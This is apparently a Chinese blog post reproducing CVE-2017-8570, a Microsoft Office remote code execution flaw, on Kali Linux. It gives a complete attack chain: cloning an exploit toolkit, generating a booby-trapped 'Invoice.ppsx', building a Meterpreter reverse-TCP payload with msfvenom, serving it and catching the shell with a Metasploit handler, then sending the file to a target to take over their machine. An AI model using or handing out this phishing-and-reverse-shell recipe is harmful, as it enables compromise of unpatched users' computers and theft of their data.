kali下CVE-2017-8570利用复现实验

参考:
https://www.youtube.com/watch?v=jUhmPH_u6gs
https://github.com/tezukanice/Office8570
https://www.symantec.com/security_response/vulnerability.jsp?bid=99445
https://www.rapid7.com/db/vulnerabilities/msft-cve-2017-8570

简介:Microsoft Office容易出现远程代码执行漏洞。 攻击者可以利用此问题在当前登录的用户的上下文中执行任意代码。 漏洞尝试可能会导致拒绝服务条件。

影响范围:
  Microsoft Office 2007 Service Pack 3
  Microsoft Office 2010 Service Pack 2 (32-bit editions)
  Microsoft Office 2010 Service Pack 2 (64-bit editions)
  Microsoft Office 2013 RT Service Pack 1
  Microsoft Office 2013 Service Pack 1 (32-bit editions)
  Microsoft Office 2013 Service Pack 1 (64-bit editions)
  Microsoft Office 2016 (32-bit edition)
  Microsoft Office 2016 (64-bit edition)

cd /tmp
git clone https://github.com/tezukanice/Office8570
cd Office8570
python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://监听者的IP/logo.doc
这里会提示找不到文件,只需要创建template目录,然后把提示到的文件mv进去就ok,用到的文件会在报错最后一行提示
再次执行一遍就成功了
生成了Invoice.ppsx文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=监听者IP LPORT=监听者端口 -f exe > /tmp/shell.exe
python cve-2017-8570_toolkit.py -M exp -e http://监听者IP/shell.exe -l /tmp/shell.exe

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 监听者IP
set LPORT 监听者端口
exploit

将Invoice.ppsx传给目标,在目标打开这个ppt文件,拿下目标。

在https://github.com/tezukanice/Office8570中,定义了三种不同情景的操作指导。


另:apt-get install bleachbit -y 
这个软件可以清理Linux电脑的一些缓存

你可能感兴趣的:(kali下CVE-2017-8570利用复现实验)